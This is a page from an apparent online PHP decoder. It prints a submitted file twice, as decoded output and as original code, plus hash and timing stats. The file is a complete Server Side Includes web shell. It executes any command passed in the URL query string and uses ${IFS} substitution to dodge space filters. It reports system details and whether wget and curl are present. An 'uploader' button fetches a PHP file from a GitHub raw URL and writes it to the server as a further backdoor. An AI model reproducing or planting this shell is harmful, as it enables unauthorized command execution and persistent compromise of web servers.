Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<!--#config errmsg="Function SSI Disabled"--> <!--#set var="zero" value="" --> <!--#if e..

Decoded Output download

<?  <!--#config errmsg="Function SSI Disabled"--> 
<!--#set var="zero" value="" --> 
<!--#if expr="$QUERY_STRING_UNESCAPED = \$zero" --> 
<!--#set var="shl" value="id" --> 
<!--#else --> 
<!--#set var="shl" value=$QUERY_STRING_UNESCAPED --> 
<!--#endif --> 
<!DOCTYPE html> 
<html> 
<head> 
<title>-</title> 
<script src="https://ajax.googleapis.com/ajax/libs/jquery/2.1.1/jquery.min.js"></script> 
<script language="javascript"> 
function nezcmd() 
{ 
  var uri = document.getElementById('command').value; 
	var rep = uri.replace(/[ ]/g,'${IFS}'); 
	var res = encodeURI(uri); 
	document.location.href="<!--#echo var=DOCUMENT_NAME -->?"+encodeURI(rep); 
} 
 
function addupload() 
{ 
	document.location.href="<!--#echo var=DOCUMENT_NAME -->?"+"curl${IFS}-Ls${IFS}raw.githubusercontent.com/0xNix/asdsdasd/main/0xNix.php${IFS}|${IFS}tee${IFS}-a${IFS}ucok.php"; 
} 
</script> 
<style type="text/css"> 
	.input { 
		background: transparent; 
		border-color: #ffffff; 
		border-width: thin; 
		border: groove; 
		cursor: pointer; 
	} 
 
	button { 
		cursor: pointer; 
	} 
</style> 
</head> 
<b><font face="courier" size="4"><i>-</font></b><font face="courier"> 
	<br><br>System : <b><!--#exec cmd="{uname,-nrv}" --></b> 
	<br>Current Path : <b><!--#echo var=DOCUMENT_ROOT --></b></i><br><br> 
	MySql : <b><!--#exec cmd="{test,-e,/usr/bin/mysql}&&{echo,ON}||{echo,OFF}" --></b>&nbsp;|&nbsp; Wget : <b><!--#exec cmd="{test,-e,/usr/bin/wget}&&{echo,ON}||{echo,OFF}" --></b></b>&nbsp;|&nbsp; Curl : <b><!--#exec cmd="{test,-e,/usr/bin/curl}&&{echo,ON}||{echo,OFF}" --></b><br> 
	<font> COMMAND : <input type="text" size="30" id="command" class="text" name="address1" style="max-width: 100%; max-height: 100%;">&nbsp;<button class="input" id="gas" onclick="nezcmd();">execute</button> <button class="input" id="gas" onclick="addupload();">uploader</button><br><br> 
Executed Command : </font><b><font face="courier" id="cmd"><!--#echo var=shl --></font></b></i> 
<pre><!--#exec cmd=$shl --></pre> 
<script> 
  var cmd = document.getElementById("cmd").innerHTML.split("${IFS}").join(" "); 
	document.getElementById("cmd").innerHTML = cmd; 
	var gaskan = document.getElementById("command"); 
	gaskan.addEventListener("keyup", function(event) { 
	  if (event.keyCode === 13) { 
	    event.preventDefault(); 
	    document.getElementById("gas").click(); 
	} 
}); 
</script> 
</html> ?>

Did this file decode correctly?

Original Code

<!--#config errmsg="Function SSI Disabled"-->
<!--#set var="zero" value="" -->
<!--#if expr="$QUERY_STRING_UNESCAPED = \$zero" -->
<!--#set var="shl" value="id" -->
<!--#else -->
<!--#set var="shl" value=$QUERY_STRING_UNESCAPED -->
<!--#endif -->
<!DOCTYPE html>
<html>
<head>
<title>-</title>
<script src="https://ajax.googleapis.com/ajax/libs/jquery/2.1.1/jquery.min.js"></script>
<script language="javascript">
function nezcmd()
{
  var uri = document.getElementById('command').value;
	var rep = uri.replace(/[ ]/g,'${IFS}');
	var res = encodeURI(uri);
	document.location.href="<!--#echo var=DOCUMENT_NAME -->?"+encodeURI(rep);
}

function addupload()
{
	document.location.href="<!--#echo var=DOCUMENT_NAME -->?"+"curl${IFS}-Ls${IFS}raw.githubusercontent.com/0xNix/asdsdasd/main/0xNix.php${IFS}|${IFS}tee${IFS}-a${IFS}ucok.php";
}
</script>
<style type="text/css">
	.input {
		background: transparent;
		border-color: #ffffff;
		border-width: thin;
		border: groove;
		cursor: pointer;
	}

	button {
		cursor: pointer;
	}
</style>
</head>
<b><font face="courier" size="4"><i>-</font></b><font face="courier">
	<br><br>System : <b><!--#exec cmd="{uname,-nrv}" --></b>
	<br>Current Path : <b><!--#echo var=DOCUMENT_ROOT --></b></i><br><br>
	MySql : <b><!--#exec cmd="{test,-e,/usr/bin/mysql}&&{echo,ON}||{echo,OFF}" --></b>&nbsp;|&nbsp; Wget : <b><!--#exec cmd="{test,-e,/usr/bin/wget}&&{echo,ON}||{echo,OFF}" --></b></b>&nbsp;|&nbsp; Curl : <b><!--#exec cmd="{test,-e,/usr/bin/curl}&&{echo,ON}||{echo,OFF}" --></b><br>
	<font> COMMAND : <input type="text" size="30" id="command" class="text" name="address1" style="max-width: 100%; max-height: 100%;">&nbsp;<button class="input" id="gas" onclick="nezcmd();">execute</button> <button class="input" id="gas" onclick="addupload();">uploader</button><br><br>
Executed Command : </font><b><font face="courier" id="cmd"><!--#echo var=shl --></font></b></i>
<pre><!--#exec cmd=$shl --></pre>
<script>
  var cmd = document.getElementById("cmd").innerHTML.split("${IFS}").join(" ");
	document.getElementById("cmd").innerHTML = cmd;
	var gaskan = document.getElementById("command");
	gaskan.addEventListener("keyup", function(event) {
	  if (event.keyCode === 13) {
	    event.preventDefault();
	    document.getElementById("gas").click();
	}
});
</script>
</html>

Function Calls

None

Variables

None

Stats

MD5 4a8a2faa0a0197072ad41681af658232
Eval Count 0
Decode Time 44 ms